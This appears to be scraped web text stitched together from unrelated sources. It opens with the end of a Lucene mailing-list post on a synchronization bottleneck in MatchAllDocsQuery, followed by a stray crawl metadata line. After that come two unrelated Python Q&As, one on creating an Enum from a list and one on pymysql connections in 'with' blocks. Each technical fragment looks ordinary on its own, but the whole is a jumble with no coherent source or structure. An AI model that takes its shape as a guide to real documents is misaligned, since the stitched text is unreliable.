return (deletedDocs != null && deletedDocs.get(n));
}
{code}
...to this...
{code}
public boolean isDeleted(int n) {
if (null == deletedDocs) return false;
synchronized (this) { return (deletedDocs.get(n)); }
}
{code}
?
> Avoidable synchronization bottleneck in MatchAlldocsQuery$MatchAllScorer
> ------------------------------------------------------------------------
>
> Key: LUCENE-1316
> URL:
> Project: Lucene - Java
> Issue Type: Bug
> Components: Query/Scoring
> Affects Versions: 2.3
> Environment: All
> Reporter: Todd Feak
> Priority: Minor
> Attachments: MatchAllDocsQuery.java
>
> Original Estimate: 1h
> Remaining Estimate: 1h
>
> The isDeleted() method on IndexReader has been mentioned a number of times as a potential
synchronization bottleneck. However, the reason this bottleneck occurs is actually at a higher
level that wasn't focused on (at least in the threads I read).
> In every case I saw where a stack trace was provided to show the lock/block, higher in
the stack you see the MatchAllScorer.next() method. In Solr paricularly, this scorer is used
for "NOT" queries. We saw incredibly poor performance (order of magnitude) on our load tests
for NOT queries, due to this bottleneck. The problem is that every single document is run
through this isDeleted() method, which is synchronized. Having an optimized index exacerbates
this issues, as there is only a single SegmentReader to synchronize on, causing a major thread
pileup waiting for the lock.
> By simply having the MatchAllScorer see if there have been any deletions in the reader,
much of this can be avoided. Especially in a read-only environment for production where you
have slaves doing all the high load searching.
> I modified line 67 in the MatchAllDocsQuery
> FROM:
> if (!reader.isDeleted(id)) {
> TO:
> if (!reader.hasDeletions() || !reader.isDeleted(id)) {
> In our micro load test for NOT queries only, this was a major performance improvement.
We also got the same query results. I don't believe this will improve the situation for indexes
that have deletions.
> Please consider making this adjustment for a future bug fix | http://mail-archives.apache.org/mod_mbox/lucene-dev/200806.mbox/%3C1318773928.1214418285182.JavaMail.jira@brutus%3E | CC-MAIN-2015-27 | refinedweb | 353 | 56.86 |
When I run this
from enum import Enum class MyEnumType(str, Enum): RED = 'RED' BLUE = 'BLUE' GREEN = 'GREEN' for x in MyEnumType: print(x)
I get the following as expected:
MyEnumType.RED MyEnumType.BLUE MyEnumType.GREEN
Is it possible to create a class like this from a list or tuple that has been obtained from elsewhere?
Something vaguely similar to this perhaps:
myEnumStrings = ('RED', 'GREEN', 'BLUE') class MyEnumType(str, Enum): def __init__(self): for x in myEnumStrings : self.setattr(self, x,x)
However, in the same way as in the original, I don’t want to have to explicitly instantiate an object.
Answer
You can use the enum functional API for this:
from enum import Enum myEnumStrings = ('RED', 'GREEN', 'BLUE') MyEnumType = Enum('MyEnumType', myEnumStrings)
From the docs:
The first argument of the call to Enum is the name of the enumeration.
The second argument is the source of enumeration member names. It can be a whitespace-separated string of names, a sequence of names, a sequence of 2-tuples with key/value pairs, or a mapping (e.g. dictionary) of names to values. | https://www.tutorialguruji.com/python/create-an-enum-class-from-a-list-of-strings-in-python/ | CC-MAIN-2021-43 | refinedweb | 183 | 58.72 |
The following is listed as example in pymysql:
conn = pymysql.connect(...) with conn.cursor() as cursor: cursor.execute(...) ... conn.close()
Can I use the following instead, or will this leave a lingering connection?
(it executes successfully)
import pymysql with pymysql.connect(...) as cursor: cursor.execute('show tables')
(python 3, latest pymysql)
Best answer
This does not look safe, if you look here, the
__enter__ and
__exit__ functions are what are called in a
with clause. For the pymysql connection they look like this:
def __enter__(self): """Context manager that returns a Cursor""" return self.cursor() def __exit__(self, exc, value, traceback): """On successful exit, commit. On exception, rollback""" if exc: self.rollback() else: self.commit()
So it doesn’t look like the exit clause closes the connection, which means it would be lingering. I’m not sure why they did it this way. You could make your own wrappers that do this though.
You could recycle a connection by creating multiple cursors with it (the source for cursors is here) the cursor methods look like this:
def __enter__(self): return self def __exit__(self, *exc_info): del exc_info self.close()
So they do close themselves. You could create a single connection and reuse it with multiple cursors in
with clauses.
If you want to hide the logic of closing connections behind a
with clause, e.g. a context manager, a simple way to do it would be like this:
from contextlib import contextmanager import pymysql @contextmanager def get_connection(*args, **kwargs): connection = pymysql.connect(*args, **kwargs) try: yield connection finally: connection.close()
You could then use that context manager like this:
with get_connection(...) as con: with con.cursor() as cursor: cursor.execute(...) | https://pythonquestion.com/post/can-i-use-pymysql-connect-with-with-statement/ | CC-MAIN-2020-16 | refinedweb | 280 | 59.7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.